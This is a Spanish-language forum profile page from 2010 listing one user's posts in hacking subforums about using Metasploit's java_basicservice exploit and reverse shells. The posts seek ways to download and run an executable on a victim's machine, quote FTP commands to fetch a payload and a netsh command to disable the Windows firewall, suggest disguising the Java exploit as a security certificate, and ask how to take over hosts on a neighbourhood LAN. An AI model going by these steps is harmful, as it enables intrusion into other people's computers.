últimos mensajes de: illera88 - Página 2

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

4 Junio 2024, 07:42 am

Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios

Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... 19

11	Seguridad Informática / Nivel Web / Re: El bug del correo alternativo [HOTMAIL]	en: 28 Diciembre 2010, 03:04 am
El primer sitio donde se vió claramente como funcionaba el bug fue en este blog: http://metasploiter.blogspot.com/2010/12/bug-hotmail-al-descubierto.html Luego ya en el de "alguien" y luego en el tuyo... Pon la fuente Un saludo shell root!

12	Seguridad Informática / Hacking / Re: [Metasploit] JAVA_basicservice (Videotuto by Metasploiter)	en: 13 Diciembre 2010, 18:59 pm
Cita de: Shell Root en 13 Diciembre 2010, 17:21 pm hahahahaha que inocencia al usar OPERA, damos click en abrir. XD! NOTE: don't use java_basicservice_impl in browser autopwn because it doesn't work in an iframe against IE and causes popups in other browsers En ópera, firefox y chrome salta el aviso pero igual que con un java-drive-by y a todo el mundo le encanta... Funcionar funciona perfectamente que es lo que se quería demostrar. Luego ya cada uno puede utilizar la ingeniería social para cambiar el nombre del archivo java a uno más asequible como "certificado de seguridad" o lo que desee. Se puede modificar desde el source del code del exploit. Un saludo shell root y gracias porque mediante tus tutos empecé con metasploit. Te invito a visitar el blog www.metasploiter.blogspot.com

13	Seguridad Informática / Hacking / [Metasploit] JAVA_basicservice (Videotuto by Metasploiter)	en: 13 Diciembre 2010, 16:46 pm
Buenas a todos. Os dejo este videotuto que he encontrado en un blog Espero que os guste. Citar Aquí os dejo mi primer videotutorial para que podáis ver como se hace una explotación del exploit de java_basicservice que aun tiene un buen ratio de explotación ya que la mayoría de los usuarios aun no han actualizado a la ultima versión de java (6.22). Espero que lo disfruteis. Fuente: www.metasploiter.blogspot.com

14	Seguridad Informática / Hacking / Re: Fallo de ¿puerto? en metasploit (exploit java)	en: 2 Diciembre 2010, 06:07 am
Shell root o jhu nunca habeis probado un exploit en WAN y os ha pasado esto??? Un saludo

15	Seguridad Informática / Hacking / Fallo de ¿puerto? en metasploit (exploit java)	en: 29 Noviembre 2010, 06:29 am
Hola a todos. Estoy usando el ultimo exploit de java que es de browser. En LAN lo lanzo y hago funcionar sin problemas pero en WAN tengo alguno. Ya lo he hecho funcionar bien pero el problema es que cuando paro el servidor y lo vuelvo a lanzar el exploit (he matado el trabajo que estaba en segundo plano con "kill 0") lo vuelvo a lanzar y me lanza este error: Citar msf exploit(java_basicservice_impl) > exploit -j Exploit running as background job. msf exploit(java_basicservice_impl) > [-] Handler failed to bind to XX.XX.207.83:5000 Started reverse handler on 0.0.0.0:5000 [-] Exploit exception: The address is already in use (XX.XX.207.83:5000). Si cambio el puerto me funciona es decir que si cambio el 5000 por el 6000 vuelve a ir bien pero si relanzo el exploit despues de pararlo otra vez tengo el mismo problema... y tampoco quiero ir teniendo miles de puertos abiertos... quiero usar siempre el mismo. Qué es lo que pasa???? He probado con rexploit y lo mismo.... Un saludo y gracias

16	Seguridad Informática / Hacking / Re: Subir y ejecutar exe en shell remota	en: 15 Noviembre 2010, 03:03 am
joooodeeerrr... con lo facil que es con el metetreper.... Entonces no existe ningun comando para desgargar algo de una URL??? un saludo y gracias

17	Seguridad Informática / Hacking / Re: Subir y ejecutar exe en shell remota	en: 14 Noviembre 2010, 23:06 pm
Cita de: XXX-ZERO-XXX en 14 Noviembre 2010, 22:24 pm Pero lo de la extensión lo arreglas subiendo al ftp el server.zip ( no comprimido sino solo cambiado la extensión), despues desde la shell pones ftp ftp.webcindario.com ( por ejemplo) te pide para poner usuario, lo pones xD, y cuando pida la password no te asustes si no escribe nada solo escribela y dale a enter. Y despues q estas conectado podes poner: dir --> lista los archivos en tu ftp get server.zip C:\server.exe Fijate como hice lo de el cambio de extensiones y despues esperas q lo descargue y luego sales del ftp poniendo el comando: bye y luego ejecutas el server.exe si es lo q querias hacer.. pd: Pero claro q si usas ftp la pc victima tendra q abrir el puerto 21 pero podes desactivarle el firewall de windows por ejemplo en windows xp q es poniendo en la shell: %windir%\System32\netsh.exe firewall set opmode disable Muchas gracias por tu ayuda pero si ya necesito historias de andar abriendo puertos, desactivando firewalls... Se que lo del firewall no es más que un comando (suponiendo que usa el firewall de windows y no el del AV...) pero luego para abrir los puertos??? No se puede de la forma que te digo descargando directamente el archivo de un hosting (por ejemplo localhostr o el que sea...) y luego ya ejecutando el exe mediante linea de comandos??? Gracias de nuevo!!!

18	Seguridad Informática / Hacking / Re: [CASO REAL] Vulnerabilidades replicadas: Un barrio al descubierto	en: 14 Noviembre 2010, 02:56 am
OK. Lo de tener acceso al router está claro... Pero después ahora que estoy pensando la verdad es que no me parece tan facil conseguir una shell remota de algun host... Había pensado en el ataque al puerto 445 con el metasploit y el exploit ms06_netapi... pero está reparcheado... El resto suele usar fallos en software ( adobe, flash, java...). La pregunta es: cual sería entonces el paso siguiente si se quiere obtener una shell de los equipos que están en LAN??? (y busco algo seguro como seria el ms06_netapi sino estuviese reparcheado... no cosas como exploits de java, adobe y company) Un saludo PD: tampoco me vale autopwn o pasar el escaner de puertos al msf... Quiero hacer las cosas por algo y no lanzar la metralleta de exploits por ver.... Hay que ponerse retos!!!

19	Seguridad Informática / Hacking / Re: Subir y ejecutar exe en shell remota	en: 14 Noviembre 2010, 02:22 am
El video está muyu bien.... eso ya lo habia hecho pero lo que tengo es una shell. No la session de metetreper ya que tu usas el PAYLOAD de metetreper y yo el de shell/reverse_tcp... Y claro el comando upload no está en la shell(consola msdos de toda la vida). Lo que he pensado es que tiene que existir un comando para descargar un archivo por linea de comandos... Algo como el wget de linux de toda la vida... Entonces subiria el archivo a cualquier hosting que acepte exe y luego lo descargaría y ejecutaría por linea de comandos... Sabéis como se hace eso??? O lo que dice xxx-zero-xxx desde un ftp pero no se el comando para descargar nada desde la consola :S:S Aver si alguien me lo dice. Gracias

20	Seguridad Informática / Hacking / Subir y ejecutar exe en shell remota	en: 11 Noviembre 2010, 02:52 am
Pues eso es lo que estoy preguntando: Consigo sin problemas una shell en metasploit haciendo un ataque en WAN. Utilizo el payload shell/reverse_tcp ya que el metetreper en el exploit que yo uso no tiene buenos resultados. Al caso, simplmente quiero una vez que ya tengo la shell subir y ejecutar un exe. He buscado pero no he encontrado exactamente el comando para hacerlo... Alguien sabe como hacerlo??? Gracias

Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... 19

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines